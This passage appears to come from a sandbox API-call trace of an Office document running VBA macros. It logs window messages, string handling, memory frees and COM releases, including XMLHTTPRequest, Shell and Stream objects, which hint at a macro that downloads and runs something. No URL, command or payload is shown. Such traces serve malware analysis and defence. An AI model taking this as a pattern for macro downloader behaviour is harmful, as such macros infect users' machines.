NtdllDefWindowProc_A (hWnd=0x10230, Msg=0x1c, wParam=0x1, lParam=0x0) returned 0x0 [0045.771] DefFrameProcA (hWnd=0x10222, hWndMDIClient=0x10224, uMsg=0x1c, wParam=0x1, lParam=0x0) returned 0x0 [0048.863] SysStringByteLen (bstr="潎浲污") returned 0x6 [0048.863] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb5ce498, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0048.863] SysStringByteLen (bstr="潎浲污") returned 0x6 [0048.863] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb5ce498, cbMultiByte=7, lpWideCharStr=0xb5ce978, cchWideChar=7 | out: lpWideCharStr="Normal") returned 7 [0048.863] lstrlenA (lpString="Normal") returned 6 [0048.863] strcpy_s (in: _Dst=0x2e60d0, _DstSize=0x410, _Src="Microsoft Visual Basic for Applications" | out: _Dst="Microsoft Visual Basic for Applications") returned 0x0 [0048.863] strcat_s (in: _Destination="Microsoft Visual Basic for Applications", _SizeInBytes=0x410, _Source=" - " | out: _Destination="Microsoft Visual Basic for Applications - ") returned 0x0 [0048.863] strcat_s (in: _Destination="Microsoft Visual Basic for Applications - ", _SizeInBytes=0x410, _Source="Normal" | out: _Destination="Microsoft Visual Basic for Applications - Normal") returned 0x0 [0048.863] SetWindowTextA (hWnd=0x10222, lpString="Microsoft Visual Basic for Applications - Normal") returned 1 [0048.863] DefFrameProcA (hWnd=0x10222, hWndMDIClient=0x10224, uMsg=0xc, wParam=0x0, lParam=0x2e60d0) returned 0x0 [0048.890] PeekMessageA (in: lpMsg=0x2e6530, hWnd=0x0, wMsgFilterMin=0x1045, wMsgFilterMax=0x1045, wRemoveMsg=0x0 | out: lpMsg=0x2e6530) returned 0 [0048.890] PostMessageA (hWnd=0x20202, Msg=0x1045, wParam=0x0, lParam=0x0) returned 1 [0048.890] IMalloc:Free (This=0x7fefe015380, pv=0xb4e7630) [0048.959] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x2100, wParam=0x0, lParam=0x0) returned 0x0 [0048.959] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x2100, wParam=0x0, lParam=0x0) returned 0x0 [0048.960] CallWindowProcA (lpPrevWndFunc=0xffff021b, hWnd=0x1023e, Msg=0x5, wParam=0x0, lParam=0x0) returned 0x0 [0048.960] GetFocus () returned 0x30204 [0048.960] IsChild (hWndParent=0x10224, hWnd=0x30204) returned 0 [0048.961] DefFrameProcA (hWnd=0x10222, hWndMDIClient=0x10224, uMsg=0x86, wParam=0x0, lParam=0x0) returned 0x1 [0048.961] DefMDIChildProcA (hWnd=0x10226, uMsg=0x86, wParam=0x0, lParam=0x0) returned 0x1 [0048.961] DefMDIChildProcA (hWnd=0x10226, uMsg=0xd, wParam=0x208, lParam=0x2edfd0) returned 0x0 [0048.961] DefMDIChildProcA (hWnd=0x10226, uMsg=0x7f, wParam=0x2, lParam=0x0) returned 0x0 [0048.961] DefMDIChildProcA (hWnd=0x10226, uMsg=0x7f, wParam=0x0, lParam=0x0) returned 0x0 [0048.961] DefMDIChildProcA (hWnd=0x10226, uMsg=0x7f, wParam=0x1, lParam=0x0) returned 0x0 [0048.962] DefMDIChildProcA (hWnd=0x10226, uMsg=0xd, wParam=0x208, lParam=0x2ee020) returned 0x0 [0048.962] DefFrameProcA (hWnd=0x10222, hWndMDIClient=0x10224, uMsg=0x7f, wParam=0x2, lParam=0x0) returned 0x0 [0048.962] DefFrameProcA (hWnd=0x10222, hWndMDIClient=0x10224, uMsg=0x7f, wParam=0x0, lParam=0x0) returned 0x0 [0048.962] DefFrameProcA (hWnd=0x10222, hWndMDIClient=0x10224, uMsg=0x7f, wParam=0x1, lParam=0x0) returned 0x0 [0048.978] CallWindowProcA (lpPrevWndFunc=0xffff021b, hWnd=0x1023e, Msg=0xc16c, wParam=0x50, lParam=0x0) returned 0x0 [0048.978] DefFrameProcA (hWnd=0x10222, hWndMDIClient=0x10224, uMsg=0xc16c, wParam=0x50, lParam=0x0) returned 0x0 [0049.034] CallWindowProcA (lpPrevWndFunc=0xffff021b, hWnd=0x1023e, Msg=0xc16c, wParam=0x50, lParam=0x0) returned 0x0 [0049.034] DefFrameProcA (hWnd=0x10222, hWndMDIClient=0x10224, uMsg=0xc16c, wParam=0x50, lParam=0x0) returned 0x0 [0049.903] GetCapture () returned 0x0 [0049.903] GetCursorPos (in: lpPoint=0x2ef1e0 | out: lpPoint=0x2ef1e0*(x=471, y=172)) returned 1 [0049.903] WindowFromPoint (Point=0xac000001d7) returned 0x30204 [0049.904] GetWindowThreadProcessId (in: hWnd=0x30204, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x9dc [0049.904] SendMessageA (hWnd=0x30204, Msg=0x84, wParam=0x0, lParam=0xac01d7) returned 0x1 [0049.904] SendMessageA (hWnd=0x30204, Msg=0x20, wParam=0x30204, lParam=0x2000001) returned 0x0 [0112.696] GetWindowLongPtrA (hWnd=0x10250, nIndex=-21) returned 0x91e3308 [0112.696] NtdllDefWindowProc_A (hWnd=0x10250, Msg=0x1a, wParam=0x14, lParam=0x2ef0f8) returned 0x0 [0112.705] GetWindowLongPtrA (hWnd=0x1024e, nIndex=-21) returned 0x91e3298 [0112.705] NtdllDefWindowProc_A (hWnd=0x1024e, Msg=0x1a, wParam=0x14, lParam=0x2ef398) returned 0x0 [0112.706] GetWindowLongPtrA (hWnd=0x1024c, nIndex=-21) returned 0x91e3228 [0112.706] NtdllDefWindowProc_A (hWnd=0x1024c, Msg=0x1a, wParam=0x14, lParam=0x2ef398) returned 0x0 [0112.707] GetWindowLongPtrA (hWnd=0x1024a, nIndex=-21) returned 0x91e31b8 [0112.707] NtdllDefWindowProc_A (hWnd=0x1024a, Msg=0x1a, wParam=0x14, lParam=0x2ef398) returned 0x0 [0112.707] CallWindowProcA (lpPrevWndFunc=0xffff021b, hWnd=0x1023e, Msg=0x1a, wParam=0x14, lParam=0x2ef0f8) returned 0x0 [0112.709] NtdllDefWindowProc_A (hWnd=0x10230, Msg=0x1a, wParam=0x14, lParam=0x2ef0f8) returned 0x0 [0112.736] DefFrameProcA (hWnd=0x10222, hWndMDIClient=0x10224, uMsg=0x1a, wParam=0x14, lParam=0x2ef0f8) returned 0x0 [0112.772] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2ef0f8, cbMultiByte=-1, lpWideCharStr=0x2eee40, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0112.782] _wcsicmp (_String1="", _String2="intl") returned -105 [0112.782] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x1a, wParam=0x14, lParam=0x2ef0f8) returned 0x0 [0113.077] GetWindowLongPtrA (hWnd=0x10250, nIndex=-21) returned 0x91e3308 [0113.077] NtdllDefWindowProc_A (hWnd=0x10250, Msg=0x3e0, wParam=0x201ac, lParam=0xffffffffc12ec12f) returned 0x0 [0113.078] GetWindowLongPtrA (hWnd=0x1024e, nIndex=-21) returned 0x91e3298 [0113.078] NtdllDefWindowProc_A (hWnd=0x1024e, Msg=0x3e0, wParam=0x201ac, lParam=0xffffffffc12ec12f) returned 0x0 [0113.079] GetWindowLongPtrA (hWnd=0x1024c, nIndex=-21) returned 0x91e3228 [0113.079] NtdllDefWindowProc_A (hWnd=0x1024c, Msg=0x3e0, wParam=0x201ac, lParam=0xffffffffc12ec12f) returned 0x0 [0113.079] GetWindowLongPtrA (hWnd=0x1024a, nIndex=-21) returned 0x91e31b8 [0113.079] NtdllDefWindowProc_A (hWnd=0x1024a, Msg=0x3e0, wParam=0x201ac, lParam=0xffffffffc12ec12f) returned 0x0 [0113.080] CallWindowProcA (lpPrevWndFunc=0xffff021b, hWnd=0x1023e, Msg=0x3e0, wParam=0x201ac, lParam=0xffffffffc12ec12f) returned 0x0 [0113.086] NtdllDefWindowProc_A (hWnd=0x10230, Msg=0x3e0, wParam=0x201ac, lParam=0xffffffffc12ec12f) returned 0x0 [0113.087] DefFrameProcA (hWnd=0x10222, hWndMDIClient=0x10224, uMsg=0x3e0, wParam=0x201ac, lParam=0xffffffffc12ec12f) returned 0x0 [0115.539] GetWindowLongPtrA (hWnd=0x10250, nIndex=-21) returned 0x91e3308 [0115.539] NtdllDefWindowProc_A (hWnd=0x10250, Msg=0x1c, wParam=0x0, lParam=0x8f0) returned 0x0 [0115.539] GetWindowLongPtrA (hWnd=0x1024e, nIndex=-21) returned 0x91e3298 [0115.539] NtdllDefWindowProc_A (hWnd=0x1024e, Msg=0x1c, wParam=0x0, lParam=0x8f0) returned 0x0 [0115.539] GetWindowLongPtrA (hWnd=0x1024c, nIndex=-21) returned 0x91e3228 [0115.539] NtdllDefWindowProc_A (hWnd=0x1024c, Msg=0x1c, wParam=0x0, lParam=0x8f0) returned 0x0 [0115.539] GetWindowLongPtrA (hWnd=0x1024a, nIndex=-21) returned 0x91e31b8 [0115.539] NtdllDefWindowProc_A (hWnd=0x1024a, Msg=0x1c, wParam=0x0, lParam=0x8f0) returned 0x0 [0115.539] CallWindowProcA (lpPrevWndFunc=0xffff021b, hWnd=0x1023e, Msg=0x1c, wParam=0x0, lParam=0x8f0) returned 0x0 [0115.539] NtdllDefWindowProc_A (hWnd=0x10230, Msg=0x1c, wParam=0x0, lParam=0x8f0) returned 0x0 [0115.539] DefFrameProcA (hWnd=0x10222, hWndMDIClient=0x10224, uMsg=0x1c, wParam=0x0, lParam=0x8f0) returned 0x0 [0115.542] DefFrameProcA (hWnd=0x10222, hWndMDIClient=0x10224, uMsg=0x86, wParam=0x0, lParam=0x0) returned 0x1 [0115.542] DefMDIChildProcA (hWnd=0x10226, uMsg=0x86, wParam=0x0, lParam=0x0) returned 0x1 [0115.542] DefMDIChildProcA (hWnd=0x10226, uMsg=0xd, wParam=0x208, lParam=0x2edfd0) returned 0x0 [0115.542] DefMDIChildProcA (hWnd=0x10226, uMsg=0xd, wParam=0x208, lParam=0x2ee020) returned 0x0 [0125.001] GetWindowLongPtrA (hWnd=0x10250, nIndex=-21) returned 0x91e3308 [0125.001] NtdllDefWindowProc_A (hWnd=0x10250, Msg=0x1c, wParam=0x1, lParam=0x704) returned 0x0 [0125.001] GetWindowLongPtrA (hWnd=0x1024e, nIndex=-21) returned 0x91e3298 [0125.001] NtdllDefWindowProc_A (hWnd=0x1024e, Msg=0x1c, wParam=0x1, lParam=0x704) returned 0x0 [0125.001] GetWindowLongPtrA (hWnd=0x1024c, nIndex=-21) returned 0x91e3228 [0125.001] NtdllDefWindowProc_A (hWnd=0x1024c, Msg=0x1c, wParam=0x1, lParam=0x704) returned 0x0 [0125.002] GetWindowLongPtrA (hWnd=0x1024a, nIndex=-21) returned 0x91e31b8 [0125.002] NtdllDefWindowProc_A (hWnd=0x1024a, Msg=0x1c, wParam=0x1, lParam=0x704) returned 0x0 [0125.002] CallWindowProcA (lpPrevWndFunc=0xffff021b, hWnd=0x1023e, Msg=0x1c, wParam=0x1, lParam=0x704) returned 0x0 [0125.002] NtdllDefWindowProc_A (hWnd=0x10230, Msg=0x1c, wParam=0x1, lParam=0x704) returned 0x0 [0125.002] DefFrameProcA (hWnd=0x10222, hWndMDIClient=0x10224, uMsg=0x1c, wParam=0x1, lParam=0x704) returned 0x0 [0129.116] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x1102, wParam=0x1, lParam=0x780d3e0) returned 0x0 [0129.116] IMalloc:Free (This=0x7fefe015380, pv=0x7534be0) [0129.116] IMalloc:Free (This=0x7fefe015380, pv=0xb471630) [0129.116] IMalloc:Free (This=0x7fefe015380, pv=0xb4715b0) [0129.117] DestroyWindow (hWnd=0x20252) returned 1 [0129.117] GetPropA (hWnd=0x20252, lpString="VBAutomation") returned 0x0 [0129.118] IMalloc:Alloc (This=0x7fefe015380, cb=0x390) returned 0x74e1430 [0129.120] IMalloc:Alloc (This=0x7fefe015380, cb=0x3c8) returned 0x75c0640 [0129.120] IMalloc:GetSize (This=0x7fefe015380, pv=0x75c0640) returned 0x3c8 [0129.121] IMalloc:Free (This=0x7fefe015380, pv=0x765d2d0) [0129.121] XMLHTTPRequest:IUnknown:Release (This=0xaba5aa0) returned 0x0 [0129.122] IUnknown:Release (This=0x8ca82a0) returned 0x0 [0129.123] Shell:IUnknown:Release (This=0xb5a76b0) returned 0x0 [0129.124] IUnknown:Release (This=0x860b190) returned 0x0 [0129.125] Stream:IUnknown:Release (This=0xdfc1400) returned 0x0 [0129.125] IMalloc:Free (This=0x7fefe015380, pv=0xb46f2b0) [0129.125] FreeLibrary (hLibModule=0x7fee36e0000) returned 1 [0129.125] FreeLibrary (hLibModule=0x7fee36e0000) returned 1 [0129.125] FreeLibrary (hLibModule=0x7fee36e0000) returned 1 [0129.125] FreeLibrary (hLibModule=0x7fee36e0000) returned 1 [0129.125] FreeLibrary (hLibModule=0x7fee36e0000) returned 1 [0129.125] FreeLibrary (hLibModule=0x7fee36e0000) returned 1 [0129.125] IUnknown:Release (This=0x778f620) returned 0x7 [0129.125] IUnknown:Release (This=0xb4dba40) returned 0x5 [0129.125] IUnknown:Release (This=0xb5b2410) returned 0x4 [0129.125] IUnknown:Release (This=0xb5b2150) returned 0x1 [0129.125] IUnknown:Release (This=0xb5b1ff0) returned 0x2 [0129.125] IUnknown:Release (This=0xb5b2570) returned 0x1 [0129.125] IUnknown:Release (This=0xb5a51f8) returned 0x2 [0129.125] IUnknown:Release (This=0xb5b22b0) returned 0x2 [0129.125] SetErrorMode (uMode=0x8001) returned 0x8005 [0129.125] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0129.125] SetErrorMode (uMode=0x8005) returned 0x8005 [0129.126] GetProcAddress (hModule=0x7fee36e0000, lpProcName=0x2c7) returned 0x7fee3a59eb0 [0129.126] SetErrorMode (uMode=0x8001) returned 0x8005 [0129.126] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0129.126] SetErrorMode (uMode=0x8005) returned 0x8005 [0129.126] GetProcAddress (hModule=0x7fee36e0000, lpProcName=0x2cc) returned 0x7fee3a19158 [0129.126] SetErrorMode (uMode=0x8001) returned 0x8005 [0129.127] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0129.127] SetErrorMode (uMode=0x8005) returned 0x8005 [0129.127] GetProcAddress (hModule=0x7fee36e0000, lpProcName=0x2c8) returned 0x7fee3a5a03c [0129.127] SetErrorMode (uMode=0x8001) returned 0x8005 [0129.127] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0129.127] SetErrorMode (uMode=0x8005) returned 0x8005 [0129.128] GetProcAddress (hModule=0x7fee36e0000, lpProcName=0x2ad) returned 0x7fee3738ff4 [0129.128] SetErrorMode (uMode=0x8001) returned 0x8005 [0129.128] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0129.128] SetErrorMode (uMode=0x8005) returned 0x8005 [0129.128] GetProcAddress (hModule=0x7fee36e0000, lpProcName=0x2cb) returned 0x7fee39d5aa0 [0129.128] SetErrorMode (uMode=0x8001) returned 0x8005 [0129.128] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0129.128] SetErrorMode (uMode=0x8005) returned 0x8005 [0129.129] GetProcAddress (hModule=0x7fee36e0000, lpProcName=0x245) returned 0x7fee381ea78 [0129.129] SysStringByteLen (bstr="潎浲污") returned 0x6 [0129.129] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb5ce498, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0129.130] SysStringByteLen (bstr="潎浲污") returned 0x6 [0129.130] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb5ce498, cbMultiByte=7, lpWideCharStr=0xb5ce978, cchWideChar=7 | out: lpWideCharStr="Normal") returned 7 [0129.130] lstrlenA (lpString="Normal") returned 6 [0129.130] strcpy_s (in: _Dst=0x2e6cf0, _DstSize=0x410, _Src="Microsoft Visual Basic for Applications" | out: _Dst="Microsoft Visual Basic for Applications") returned 0x0 [0129.130] strcat_s (in: _Destination="Microsoft Visual Basic for Applications", _SizeInBytes=0x410, _Source=" - " | out: _Destination="Microsoft Visual Basic for Applications - ") returned 0x0 [0129.130] strcat_s (in: _Destination="Microsoft Visual Basic for Applications - ", _SizeInBytes=0x410, _Source="Normal" | out: _Destination="Microsoft Visual Basic for Applications - Normal") returned 0x0 [0129.130] SetWindowTextA (hWnd=0x10222, lpString="Microsoft Visual Basic for Applications - Normal") returned 1 [0129.130] DefFrameProcA (hWnd=0x10222, hWndMDIClient=0x10224, uMsg=0xc, wParam=0x0, lParam=0x2e6cf0) returned 0x0 [0129.130] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x1102, wParam=0x1, lParam=0x780d3e0) returned 0x0 [0129.130] CExposedDocFile::Release () returned 0x8 [0129.130] CExposedDocFile::Release () returned 0x7 [0129.130] CExposedDocFile::Release () returned 0x6 [0129.130] CExposedDocFile::Release () returned 0x5 [0129.130] CExposedDocFile::Release () returned 0x4 [0129.130] CExposedDocFile::Release () returned 0x3 [0129.130] CExposedDocFile::Release () returned 0x2 [0129.130] CExposedDocFile::Release () returned 0x1 [0129.131] SetErrorMode (uMode=0x8001) returned 0x8005 [0129.131] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0129.131] SetErrorMode (uMode=0x8005) returned 0x8005 [0129.131] GetProcAddress (hModule=0x7fee36e0000, lpProcName=0x2c7) returned 0x7fee3a59eb0 [0129.131] SetErrorMode (uMode=0x8001) returned 0x8005 [0129.131] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0129.131] SetErrorMode (uMode=0x8005) returned 0x8005 [0129.132] GetProcAddress (hModule=0x7fee36e0000, lpProcName=0x2cc) returned 0x7fee3a19158 [0129.132] SetErrorMode (uMode=0x8001) returned 0x8005 [0129.132] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0129.132] SetErrorMode (uMode=0x8005) returned 0x8005 [0129.132] GetProcAddress (hModule=0x7fee36e0000, lpProcName=0x2c8) returned 0x7fee3a5a03c [0129.132] SetErrorMode (uMode=0x8001) returned 0x8005 [0129.132] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0129.132] SetErrorMode (uMode=0x8005) returned 0x8005 [0129.133] GetProcAddress (hModule=0x7fee36e0000, lpProcName=0x2ad) returned 0x7fee3738ff4 [0129.133] SetErrorMode (uMode=0x8001) returned 0x8005 [0129.133] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0129.133] SetErrorMode (uMode=0x8005) returned 0x8005 [0129.134] GetProcAddress (hModule=0x7fee36e0000, lpProcName=0x2cb) returned 0x7fee39d5aa0 [0129.134] SetErrorMode (uMode=0x8001) returned 0x8005 [0129.134] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0129.134] SetErrorMode (uMode=0x8005) returned 0x8005 [0129.134] GetProcAddress (hModule=0x7fee36e0000, lpProcName=0x245) returned 0x7fee381ea78 [0129.135] SysStringByteLen (bstr="潎浲污") returned 0x6 [0129.135] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb5ce498, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0129.135] SysStringByteLen (bstr="潎浲污") returned 0x6 [0129.135] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb5ce498, cbMultiByte=7, lpWideCharStr=0xb5ce978, cchWideChar=7 | out: lpWideCharStr="Normal") returned 7 [0129.135] lstrlenA (lpString="Normal") returned 6 [0129.135] strcpy_s (in: _Dst=0x2e6c90, _DstSize=0x410, _Src="Microsoft Visual Basic for Applications" | out: _Dst="Microsoft Visual Basic for Applications") returned 0x0 [0129.135] strcat_s (in: _Destination="Microsoft Visual Basic for Applications", _SizeInBytes=0x410, _Source=" - " | out: _Destination="Microsoft Visual Basic for Applications - ") returned 0x0 [0129.135] strcat_s (in: _Destination="Microsoft Visual Basic for Applications - ", _SizeInBytes=0x410, _Source="Normal" | out: _Destination="Microsoft Visual Basic for Applications - Normal") returned 0x0 [0129.135] SetWindowTextA (hWnd=0x10222, lpString="Microsoft Visual Basic for Applications - Normal") returned 1 [0129.135] DefFrameProcA (hWnd=0x10222, hWndMDIClient=0x10224, uMsg=0xc, wParam=0x0, lParam=0x2e6c90) returned 0x0 [0129.136] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x1102, wParam=0x1, lParam=0x780d3e0) returned 0x0 [0129.136] IMalloc:Free (This=0x7fefe015380, pv=0xb4f6860) [0129.136] IMalloc:Free (This=0x7fefe015380, pv=0x76d95c0) [0129.148] SetCursor (hCursor=0x10007) returned 0x10003 [0129.148] CExposedDocFile::Release () returned 0x1 [0129.148] CExposedDocFile::Release () returned 0x0 [0129.148] CExposedDocFile::Release () returned 0x0 [0129.148] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x110a, wParam=0x3, lParam=0x780d380) returned 0x780ed00 [0129.148] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x1101, wParam=0x0, lParam=0x780d380) returned 0x1 [0129.148] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x110c, wParam=0x0, lParam=0x2e71a0) returned 0x1 [0129.148] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x110a, wParam=0x4, lParam=0x780ed00) returned 0x0 [0129.148] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x1101, wParam=0x0, lParam=0x780ed00) returned 0x1 [0129.151] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x110a, wParam=0x3, lParam=0x780d2c0) returned 0x780d320 [0129.151] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x1101, wParam=0x0, lParam=0x780d2c0) returned 0x1 [0129.152] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x110c, wParam=0x0, lParam=0x2e71a0) returned 0x1 [0129.152] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x110a, wParam=0x4, lParam=0x780d320) returned 0x0 [0129.152] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x1101, wParam=0x0, lParam=0x780d320) returned 0x1 [0129.152] GetCurrentThreadId () returned 0x9dc [0129.152] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x110a, wParam=0x3, lParam=0x780d200) returned 0x780d260 [0129.152] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x1101, wParam=0x0, lParam=0x780d200) returned 0x1 [0129.152] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x110c, wParam=0x0, lParam=0x2e71a0) returned 0x1 [0129.152] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x110a, wParam=0x4, lParam=0x780d260) returned 0x780d1a0 [0129.152] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x110a, wParam=0x3, lParam=0x780d1a0) returned 0x780d260 [0129.153] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x1101, wParam=0x0, lParam=0x780d1a0) returned 0x1 [0129.153] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x110c, wParam=0x0, lParam=0x2e71a0) returned 0x1 [0129.153] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x110a, wParam=0x4, lParam=0x780d260) returned 0x780d140 [0129.153] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x110a, wParam=0x3, lParam=0x780d140) returned 0x780d260 [0129.153] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x1101, wParam=0x0, lParam=0x780d140) returned 0x1 [0129.153] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x110c, wParam=0x0, lParam=0x2e71a0) returned 0x1 [0129.153] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x110a, wParam=0x4, lParam=0x780d260) returned 0x0 [0129.153] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x1101, wParam=0x0, lParam=0x780d260) returned 0x1 [0129.153] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x110a, wParam=0x3, lParam=0x780d080) returned 0x780d0e0 [0129.153] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x1101, wParam=0x0, lParam=0x780d080) returned 0x1 [0129.153] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x110c, wParam=0x0, lParam=0x2e71a0) returned 0x1 [0129.153] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x110a, wParam=0x4, lParam=0x780d0e0) returned 0x780d020 [0129.153] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x110a, wParam=0x3, lParam=0x780d020) returned 0x780d0e0 [0129.153] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x1101, wParam=0x0, lParam=0x780d020) returned 0x1 [0129.153] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x110c, wParam=0x0, lParam=0x2e71a0) returned 0x1 [0129.153] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x110a, wParam=0x4, lParam=0x780d0e0) returned 0x0 [0129.153] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x1101, wParam=0x0, lParam=0x780d0e0) returned 0x1 [0129.154] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x110a, wParam=0x4, lParam=0x780d3e0) returned 0x780cea0 [0129.154] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x110c, wParam=0x0, lParam=0x2e7200) returned 0x1 [0129.154] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x110a, wParam=0x4, lParam=0x780cea0) returned 0x780ce40 [0129.154] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x110c, wParam=0x0, lParam=0x2e7200) returned 0x1 [0129.154] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x1101, wParam=0x0, lParam=0x780ce40) returned 0x1 [0129.154] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x110a, wParam=0x4, lParam=0x780cea0) returned 0x0 [0129.154] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x1101, wParam=0x0, lParam=0x780cea0) returned 0x1 [0129.154] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x110a, wParam=0x4, lParam=0x780d3e0) returned 0x0 [0129.154] SendMessageA (hWnd=0x1022a, Msg=0x1101, wParam=0x0, lParam=0x780d3e0) returned 0x1 [0129.154] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x1101, wParam=0x0, lParam=0x780d3e0) returned 0x1 [0129.154] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x46, wParam=0x0, lParam=0x2e6a80) returned 0x0 [0129.154] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x83, wParam=0x1, lParam=0x2e6a50) returned 0x0 [0129.154] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x47, wParam=0x0, lParam=0x2e6a80) returned 0x0 [0129.154] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x5, wParam=0x0, lParam=0x320060) returned 0x0 [0129.155] SendMessageA (hWnd=0x1022a, Msg=0x1105, wParam=0x0, lParam=0x0) returned 0x3 [0129.155] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x1105, wParam=0x0, lParam=0x0) returned 0x3 [0129.155] IMalloc:Free (This=0x7fefe015380, pv=0xb5de630) [0129.155] IMalloc:Free (This=0x7fefe015380, pv=0x75dc4f0) [0129.156] IMalloc:Free (This=0x7fefe015380, pv=0x75dc570) [0129.156] IMalloc:Free (This=0x7fefe015380, pv=0x75dc4b0) [0129.156] IMalloc:Free (This=0x7fefe015380, pv=0x75dc6f0) [0129.156] IMalloc:Free (This=0x7fefe015380, pv=0x75ddd30) [0129.156] IMalloc:Free (This=0x7fefe015380, pv=0x75dec30) [0129.156] IMalloc:Free (This=0x7fefe015380, pv=0x75dec70) [0129.156] IMalloc:Free (This=0x7fefe015380, pv=0x75df8b0) [0129.156] IMalloc:Free (This=0x7fefe015380, pv=0x76db780) [0129.156] IMalloc:Free (This=0x7fefe015380, pv=0xb4e38a0) [0129.156] IMalloc:Free 